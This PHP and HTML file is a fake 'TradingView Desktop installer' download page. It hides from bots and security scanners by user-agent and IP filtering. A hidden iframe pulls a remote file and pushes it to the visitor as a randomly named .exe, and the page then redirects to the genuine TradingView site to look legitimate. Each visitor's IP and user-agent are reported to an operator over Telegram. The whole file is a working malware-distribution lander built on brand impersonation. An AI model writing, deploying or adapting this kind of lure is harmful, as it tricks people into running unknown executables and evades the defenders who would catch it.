<?php
/**
 * -----------------------------------------------------------
 * Configuration and Initialization
 * -----------------------------------------------------------
 */

$configFile = 'config.json';

// Load configuration
if (file_exists($configFile)) {
    $config = json_decode(file_get_contents($configFile), true);
} else {
    exit("Error: Configuration file not found.");
}

// Assign values from config.json
$linksFile             = 'Links.txt';
$jsonFile              = 'url_ip_ua_map.json';
$logFile               = 'activity.log';
$telegramToken         = $config['telegramToken'];
$chatIdAlert           = $config['chatIdAlert'];
$chatIdTraffic         = $config['chatIdTraffic'];
$randomFilenamePrefix  = $config['randomFilenamePrefix'];
$botPatterns           = ['curl', 'python-requests', 'bot', 'spider', 'crawler'];

/**
 * -----------------------------------------------------------
 * Helper Functions
 * -----------------------------------------------------------
 */

// Log events
function logEvent($message) {
    global $logFile;
    file_put_contents($logFile, "[" . date('Y-m-d H:i:s') . "] $message\n", FILE_APPEND);
}

// Send Telegram notification
function sendTelegramAlert($chatId, $message) {
    global $telegramToken;
    $url  = "https://api.telegram.org/bot$telegramToken/sendMessage";
    $data = ['chat_id' => $chatId, 'text' => $message];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    curl_close($ch);
}

// Get real IP address
function getRealIP() {
    return $_SERVER['HTTP_CF_CONNECTING_IP'] ?? $_SERVER['REMOTE_ADDR'];
}

// Check if User-Agent is a bot
function isBot($userAgent) {
    global $botPatterns;
    foreach ($botPatterns as $pattern) {
        if (stripos($userAgent, $pattern) !== false) {
            return true;
        }
    }
    return false;
}

// Validate real IP (not private or reserved)
function isValidRealIP($ip) {
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
}

// Read JSON data
function readJsonFile($filePath) {
    return file_exists($filePath) ? json_decode(file_get_contents($filePath), true) : [];
}

// Write JSON data
function writeJsonFile($filePath, $data) {
    file_put_contents($filePath, json_encode($data, JSON_PRETTY_PRINT));
}

// Assign a download link to an IP (ensures same IP gets same link)
function assignLink($ip) {
    global $linksFile, $jsonFile, $chatIdAlert;

    $data = readJsonFile($jsonFile);

    // If IP already assigned a link, reuse it
    if (isset($data[$ip])) {
        return $data[$ip];
    }

    // Otherwise pick from the top of Links.txt
    $links = file($linksFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if (empty($links)) {
        return false;
    }

    // If the file is nearly empty, warn via Telegram
    if (count($links) <= 5) {
        sendTelegramAlert($chatIdAlert, "⚠️ Only " . count($links) . " links remaining in Links.txt! Please update.");
        logEvent("Warning: Only " . count($links) . " links remaining.");
    }

    $url = array_shift($links);
    $data[$ip] = $url;

    // Update JSON
    writeJsonFile($jsonFile, $data);
    // Remove used link from Links.txt
    file_put_contents($linksFile, implode("\n", $links));

    return $url;
}

// Extract "s" parameter from the link
function extractSParameter($url) {
    $query = parse_url($url, PHP_URL_QUERY);
    parse_str($query, $params);
    return $params['s'] ?? 'Unknown';
}

// Fetch remote file
function fetchRemoteFile($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_HEADER, false);

    $data = curl_exec($ch);
    $error = curl_errno($ch);
    curl_close($ch);

    return $error ? false : $data;
}

/**
 * -----------------------------------------------------------
 * Main Execution
 * -----------------------------------------------------------
 */

// STEP 1: If handling a "secure download" request in an iFrame
if (isset($_GET['download'])) {
    $link = base64_decode($_GET['download']);
    if (!filter_var($link, FILTER_VALIDATE_URL)) {
        exit("Invalid download URL.");
    }

    $fileContents = fetchRemoteFile($link);
    if (!$fileContents) {
        exit("Error downloading file.");
    }

    // Generate masked filename
    $randomFilename = $randomFilenamePrefix . "_" . uniqid() . ".exe";

    // Serve the file for download (in this iFrame response)
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $randomFilename . '"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . strlen($fileContents));

    echo $fileContents;
    exit();
}

// STEP 2: Normal visitor request (no `?download=` param)
$ip = getRealIP();
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';

// Block bots
if (isBot($userAgent)) {
    logEvent("Blocked bot: $ip - $userAgent");
    exit("Access denied.");
}

// Allow only real IPs
if (!isValidRealIP($ip)) {
    logEvent("Blocked non-real IP: $ip");
    sendTelegramAlert($chatIdAlert, "❌ Access denied for non-real IP: $ip");
    exit("Access denied.");
}

// Assign a link to the user
$link = assignLink($ip);
if (!$link) {
    sendTelegramAlert($chatIdAlert, "❌ Links.txt is empty!");
    logEvent("Error: No links available for $ip.");
    exit("No links available.");
}

// Extract "s" parameter
$sParameter = extractSParameter($link);

// Generate a masked download URL for iFrame
$maskedURL = "?download=" . urlencode(base64_encode($link));

// Telegram Alert about new visitor
$telegramMessage = <<<TEXT
🛂 New Visitor Alert
🈯 URL: {$sParameter}
🆙 IP: {$ip}
✅ User-Agent: {$userAgent}
TEXT;
sendTelegramAlert($chatIdTraffic, $telegramMessage);

/**
 * STEP 3: Serve a “preparing download” page with improved styling.
 *   - Hidden iFrame triggers the actual file download.
 *   - After 3s, auto-redirect to https://www.tradingview.com/
 */
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Preparing your download...</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    /* Basic Reset + Body */
    * { box-sizing: border-box; margin:0; padding:0; }
    body {
      background: #0f131f;
      color: #ccc;
      font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
      min-height: 100vh;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
    }

    /* Download Box Container */
    .download-box {
      background: #1b2030;
      border: 1px solid #303744;
      border-radius: 8px;
      padding: 40px;
      max-width: 500px;
      text-align: center;
      animation: fadeIn 0.5s ease;
    }

    .download-title {
      font-size: 2rem;
      color: #fff;
      margin-bottom: 15px;
    }
    .download-text {
      font-size: 1.05rem;
      color: #bbb;
      margin-bottom: 25px;
      line-height: 1.6;
      max-width: 400px;
      margin: 0 auto 25px auto;
    }

    /* Spinner animation */
    .download-spinner {
      margin: 0 auto 25px auto;
      width: 48px;
      height: 48px;
      border-radius: 50%;
      border: 6px solid #444;
      border-top-color: #f900b0;
      animation: spin 1s linear infinite;
    }

    @keyframes spin {
      to { transform: rotate(360deg); }
    }

    @keyframes fadeIn {
      from { opacity: 0; transform: scale(0.95); }
      to   { opacity: 1; transform: scale(1); }
    }

    .hiddenIframe {
      display: none;
    }

    .note {
      color: #666;
      margin-top: 5px;
      font-size:0.85rem;
    }
  </style>
  <script>
    // Automatically redirect after 3 seconds
    setTimeout(function(){
      window.location.href = "https://www.tradingview.com/";
    }, 3000);
  </script>
</head>
<body>
  <div class="download-box">
    <h1 class="download-title">Preparing Your Download</h1>
    <div class="download-spinner"></div>
    <p class="download-text">
      Your TradingView Desktop installer is on its way. 
      Once the file download starts, you’ll be automatically redirected 
      to TradingView for more charts and insights. Please wait...
    </p>
    <iframe class="hiddenIframe" src="<?php echo htmlspecialchars($maskedURL); ?>"></iframe>
    <p class="note">
      If nothing happens, please ensure you allow downloads in your browser.
    </p>
  </div>
</body>
</html>
